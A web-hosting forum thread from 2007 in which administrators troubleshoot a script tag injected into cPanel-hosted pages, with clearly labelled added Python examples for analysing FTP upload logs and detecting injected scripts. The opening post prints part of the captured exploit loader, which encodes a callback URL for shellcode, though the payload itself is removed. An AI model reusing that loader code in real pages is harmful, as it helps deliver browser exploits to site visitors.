Linux servers having CPANEL - js virus hitting

#1 | WHT Addict | Join Date: May 2004 | Location: chicago | Posts: 173

Hi All,


Earlier this week, our users started reporting that they were getting ActiveX prompts for a Microsoft Data Access Component installation. In addition, some of them were getting hit by the RTSP bug (QuickTime) and some were getting JS/Exploit-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple html, php, etc.), at times a script tag similar to the one below is inserted right after the <body> tag.

<script language='JavaScript' type='text/javascript' src='shfuy.js'></script>

The javascript file name changes and the problem only occurs at times. There is no set pattern to reproduce the problem although I have noticed that if I connect to the server via a new IP address from my DSL connection, I get the javascript in the source.

I ran some sniffer traces on the server and my laptop. This showed that the javascript was being sent by the server. I was able to capture the javascript (contents of the javascript below).

Solutions tried:
I have checked for the filenames, but they do not exist on the server.

1) Have run chkrootkit and rootkit hunter - all clean
2) Have run clamav - all clean


I would appreciate it if anybody could provide some input on what we might be dealing with and how to resolve the problem.

Javascript code (the encoded payload assigned to SB was removed by the moderators):

    // Build the URL the loader refers back to on the compromised host.
    var arg = "akmukvfd";
    var MU = "http://" + window.location.hostname + "/" + arg;

    // Hex-encode every character of the URL as two uppercase hex digits.
    var MH = '';
    for (var i = 0; i < MU.length; i++)
    {
        var b = MU.charCodeAt(i);
        MH = MH + b.toString(16);
    }
    MH = MH.toUpperCase();
    // If the URL has an odd number of characters, pad the hex string so its
    // length is a multiple of four and the %u groups below are whole.
    if (Math.round(MU.length / 2) != (MU.length / 2))
    {
        MH += '00';
    }

    // Re-emit the hex as %uXXXX escapes, two bytes per unit with the byte
    // order swapped (little-endian).
    var MR = '';
    for (var i = 0; i < MH.length; i += 4)
    {
        MR = MR + '%u' + MH.substring(i + 2, i + 4) + MH.substring(i, i + 2);
    }

    // Quoted copies of the plain and the escaped URL; their use was in the
    // part that was removed.
    var MU2 = "\"" + MU + "\"";
    var MR2 = "\"" + MR + "\"";

    var SB =
    <<removed encoded exploit>>

    document.write(SB);

Thanks,
Regards
Rushik Shah

__________________
CEO - Alakmalak Technologies www.Alakmalak.com
Web Application Development : Website Development Web Designing
Support Toll Free +1-800-789-9620 Skype : rushik Operating Since 2003 || Team size of 35+ Web development center at INDIA


Last edited by bear; 11-25-2007 at 09:59 PM. Reason: Pointless to help spread this


#2 | Web Hosting Master | Join Date: Apr 2001 | Location: Paradise | Posts: 11,603

Does anybody have the FTP information of all the accounts having this problem? It may be possible that a compromised computer was infecting those sites without anyone even knowing it.

__________________
Shared Web Hosting - Reseller Hosting - Semi-Dedicated Servers - SolusVM/XEN VPS
LiteSpeed Powered - R1Soft Continuous Data Protection - 24/7 Chat/Email/Helpdesk Support
Cpanel/WHM - Softaculous - R1soft Backup - Litespeed - Cloudlinux -Site Builder- SSH support - Account Migration
DowntownHost LLC - In Business since 2001- West/Center/East USA - Netherlands - Singapore

#3 | & Goliath | Join Date: Oct 2003 | Location: Chattanooga | Posts: 8,903

It's more than likely it was just a deface of the specific account. Doubtful that it's an end-user's system being exploited and then FTPing up the data; far too much effort.

#4 | WHT Addict | Join Date: May 2004 | Location: chicago | Posts: 173

Hi Jedito / David,

Thanks for your quick reply. Actually, I already did this check.

I changed FTP passwords, but it still got affected again after 3-4 days.

The matter of fact is, almost all websites on the server are affected, mostly the index.html and php files.

Any clue?

Thanks!
Regards
Rushik Shah


#5 | Web Hosting Master | Join Date: Apr 2001 | Location: Paradise | Posts: 11,603

Quote:
Originally Posted by David
It's more than likely it was just a deface of the specific account. Doubtful that it's an end-user's system being exploited and then FTPing up the data; far too much effort.

There's a trojan which does this automatically: the trojan infects the computer and picks up all the FTP bookmarks of any FTP program installed on the computer, then sends them to the "hacker", who later uses them to upload the infected data. This happened to one of my resellers a while ago.

To the OP: check the FTP logs of the affected accounts for which files were uploaded, and check whether the IP that uploaded those files mismatches in all of them.


#6 | Web Hosting Evangelist | Join Date: Jul 2005 | Location: Belgium | Posts: 506

Hi,

Which platforms does this trojan infect? Do you know its name?

Thanks,
sash

__________________
kept alive by vertaalbureau

#7 | Junior Guru Wannabe | Join Date: Nov 2007 | Posts: 51

Is there a way to stop this from happening on a cpanel server?

#8 | Community Guide | Join Date: Apr 2005 | Posts: 1,551

Looks like a buffer overflow JS exploit. NoScript stops it, but I would do this:

find / -name '*.js' -print0 | xargs -0 grep unescape

__________________
☊ Talk to family, friends, teammates and colleagues with a myMumble voice server. Over 14 locations around the world!
SysadminBoard - Share and obtain knowledge directly from veteran systems administrators.

#9 | the ground beneath my feet | Join Date: Feb 2006 | Posts: 1,108

The code is here: <<snipped>>

__________________
semi-retired


Last edited by not-even-a-mouse; 11-25-2007 at 09:04 PM.
#10 | Community Guide | Join Date: Apr 2005 | Posts: 1,551

Also, check xferlog and see who uploaded it.

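Posts #5 and #10 both point at the FTP transfer log as the place to establish who put the modified pages there. The script below is an added example, not code from anyone in this thread: it parses xferlog lines, keeps only completed uploads, and then asks two questions a shared-hosting admin would ask here, which accounts received uploads from more than one address, and which addresses uploaded into several unrelated accounts (the pattern a batch of stolen FTP credentials replayed from one machine would leave). The log lines, account names and documentation-range IP addresses are constructed sample data.

```python
"""Correlate FTP uploads across accounts from an xferlog.

Added example, not from the thread. The log lines below are constructed
sample data with documentation-range IP addresses and made-up account names.
"""
import os
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample xferlog (wu-ftpd/proftpd/pure-ftpd format). Fields:
# date (5 tokens) xfer-time host size path type special direction access
# user service auth uid status
SAMPLE_XFERLOG = [
    "Mon Nov 19 10:02:11 2007 1 198.51.100.7 5120 /home/acct1/public_html/about.html a _ i r acct1 ftp 0 * c",
    "Tue Nov 20 03:14:07 2007 1 203.0.113.45 4096 /home/acct1/public_html/index.html a _ i r acct1 ftp 0 * c",
    "Tue Nov 20 03:14:09 2007 1 203.0.113.45 3890 /home/acct2/public_html/index.php a _ i r acct2 ftp 0 * c",
    "Tue Nov 20 03:14:12 2007 1 203.0.113.45 2201 /home/acct3/public_html/index.html a _ i r acct3 ftp 0 * c",
    "Wed Nov 21 14:30:00 2007 2 192.0.2.88 10240 /home/acct2/public_html/photos/my photo.jpg b _ i r acct2 ftp 0 * c",
    "Wed Nov 21 14:35:00 2007 1 192.0.2.88 4096 /home/acct2/public_html/index.php a _ o r acct2 ftp 0 * c",
]


@dataclass(frozen=True)
class Transfer:
    when: str
    remote_host: str
    path: str
    direction: str  # 'i' = upload to the server, 'o' = download from it
    username: str
    status: str     # 'c' = complete, 'i' = incomplete


def parse_xferlog_line(line):
    """Parse one xferlog line, or return None if it is malformed.

    The path may contain spaces, so take the five timestamp tokens from the
    left and the nine fixed trailing fields from the right; whatever lies
    between (after transfer time, host and size) is the path.
    """
    parts = line.split()
    if len(parts) < 18:
        return None
    when = " ".join(parts[:5])
    remote_host = parts[6]      # parts[5] = transfer time, parts[7] = size
    path = " ".join(parts[8:-9])
    tail = parts[-9:]           # type, special, direction, access, user, service, auth, uid, status
    return Transfer(when, remote_host, path, tail[2], tail[4], tail[8])


def completed_uploads(lines):
    """Only completed uploads can have changed a file on disk."""
    return [t for t in map(parse_xferlog_line, lines)
            if t is not None and t.direction == "i" and t.status == "c"]


def upload_ips_by_account(uploads):
    """Distinct source addresses that uploaded into each account."""
    by_user = defaultdict(set)
    for t in uploads:
        by_user[t.username].add(t.remote_host)
    return dict(by_user)


def shared_upload_ips(uploads, min_accounts=2):
    """Source addresses that uploaded into several different accounts.

    One client legitimately touching many unrelated accounts on a shared
    server is rare; a single machine replaying a batch of stolen
    credentials looks exactly like this.
    """
    by_ip = defaultdict(set)
    for t in uploads:
        by_ip[t.remote_host].add(t.username)
    return {ip: sorted(users) for ip, users in by_ip.items()
            if len(users) >= min_accounts}


def index_page_uploads(uploads):
    """Uploads that replaced an index page, the files the thread says were changed."""
    return [t for t in uploads if os.path.basename(t.path).startswith("index.")]


if __name__ == "__main__":
    ups = completed_uploads(SAMPLE_XFERLOG)
    for user, ips in sorted(upload_ips_by_account(ups).items()):
        print(f"{user}: uploads from {', '.join(sorted(ips))}")
    for ip, users in shared_upload_ips(ups).items():
        print(f"IP {ip} uploaded into {len(users)} accounts: {', '.join(users)}")
    for t in index_page_uploads(ups):
        print(f"{t.when}  {t.remote_host:15}  {t.username:8}  {t.path}")
```

On a live server, pass the open log file (commonly /var/log/xferlog, though the path depends on the FTP daemon's configuration) to completed_uploads() instead of the sample list. An address that uploaded index pages into many accounts within seconds, as 203.0.113.45 does in the sample, is the signal worth pulling the corresponding FTP authentication logs for; it also tells you which passwords to rotate first, since changing only one account's password, as post #4 found, does not stop the rest being rewritten.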

#11 | Web Hosting Master | Join Date: May 2003 | Location: Kirkland, WA | Posts: 4,448

To clarify, there is absolutely no evidence provided that this is at all isolated to cPanel even if it is in fact an issue.

__________________
Nick Nelson
Sr. Director & GM, VAS
Demand Media
425.298.2282 nn@demandmedia.com

#12 | Community Guide | Join Date: Apr 2005 | Posts: 1,551

Don't paste code like that on a public forum.


#13 | the ground beneath my feet | Join Date: Feb 2006 | Posts: 1,108

Quote:
Originally Posted by zacharooni
Don't paste code like that on a public forum.

It's already in the OP, just URI encoded.


#14 | Community Leader | Join Date: Oct 2002 | Location: Neck deep in it | Posts: 20,241

Quote:
Originally Posted by Procyon
It's already in the OP, just URI encoded.

Not any more. Let's try not to feed the "kiddies".

__________________
Having problems, or maybe questions about WHT? Head over to the help desk!



#15 | Web Hosting Guru | Join Date: Sep 2003 | Location: Europe | Posts: 298

Hello Rushik,

I can second your findings. The exploit appears all the time on different pages (the page indicated by KIS keeps changing, usually HTML), it doesn't appear twice for the same IP, and this seems to me to be related to IE only. Have you discovered anything new?

Quote:
Looks like a buffer overflow JS exploit. NoScript stops it, but I would do this:

find / -name '*.js' -print0 | xargs -0 grep unescape

There is usually NO unescape(), no eval(), no iframe anywhere on the affected accounts. The .js file (this also changes) doesn't even exist anywhere on the server. It's like Trojan-Downloader.JS.Small.fs gets generated on the fly (in our case it tries to download an Exploit.HTML.IESlice.n from <<removed>>).

Any clue anyone?

Thanks and regards!


Last edited by bear; 11-28-2007 at 07:27 AM.
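Posts #1 and #15 describe the same thing from two sides: the served page carries a script tag that the file on disk, and the server's file system, do not contain. Grepping the document roots, as post #8 suggests, cannot find that. What does find it is comparing what a client actually receives with what is on disk. The script below is an added example, not code from anyone in this thread: it collects the external script references from both copies of a page, reports those present only in the served copy, and notes whether each sits directly after <body>, which is where the opening post saw the injection. DISK_HTML and SERVED_HTML are constructed sample documents (the injected tag reproduces the one quoted in post #1; /js/menu.js is made up), and compare_live is a hypothetical helper for running the same comparison against a real URL and file.

```python
"""Detect <script> tags that appear in the page a server sends but not in the
file on disk.

Added example, not from the thread. The two HTML documents below are
constructed sample data; the injected tag reproduces the one quoted in the
opening post.
"""
from html.parser import HTMLParser
import urllib.request

# Constructed: what the file in the account's document root contains.
DISK_HTML = """<html><head><title>Example</title>
<script type="text/javascript" src="/js/menu.js"></script></head>
<body><h1>Welcome</h1><p>Hello</p></body></html>"""

# Constructed: the same page as a browser received it, with a loader tag
# inserted directly after <body>.
SERVED_HTML = """<html><head><title>Example</title>
<script type="text/javascript" src="/js/menu.js"></script></head>
<body><script language='JavaScript' type='text/javascript' src='shfuy.js'></script><h1>Welcome</h1><p>Hello</p></body></html>"""


class ScriptCollector(HTMLParser):
    """Collect (src, directly_after_body) for every external <script>."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.tags_since_body = None  # None until <body> has been seen

    def handle_starttag(self, tag, attrs):
        if tag == "body":
            self.tags_since_body = 0
            return
        if self.tags_since_body is not None:
            self.tags_since_body += 1
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                # The first tag opened after <body> has a count of exactly 1.
                self.scripts.append((src, self.tags_since_body == 1))


def external_scripts(html):
    """All (src, directly_after_body) pairs in document order."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def injected_scripts(served_html, disk_html):
    """Scripts referenced by the served page but not by the on-disk file.

    An empty result means the response matched the file. Anything listed was
    added somewhere between disk and the client, which is the situation the
    thread describes: a loader whose .js is not on the server at all.
    """
    on_disk = {src for src, _ in external_scripts(disk_html)}
    return [(src, after_body) for src, after_body in external_scripts(served_html)
            if src not in on_disk]


def compare_live(url, disk_path, timeout=10):
    """Hypothetical helper: fetch url and compare it with the file at disk_path.
    Needs network access and is not exercised by the constructed sample."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        served = resp.read().decode(charset, "replace")
    with open(disk_path, encoding="utf-8", errors="replace") as f:
        return injected_scripts(served, f.read())


if __name__ == "__main__":
    for src, after_body in injected_scripts(SERVED_HTML, DISK_HTML):
        where = "directly after <body>" if after_body else "elsewhere"
        print(f"injected script {src!r} ({where})")
```

Two details from the thread matter when running this for real. The opening post saw the tag only once per new client address, so fetch from an address the server has not seen recently (and more than once, since one clean fetch proves nothing). And a mismatch between the served page and the file on disk, with no trace of the tag in any file, moves the investigation away from FTP uploads and towards whatever sits between the file system and the client: the web server and its modules, the kernel, or a device in the path.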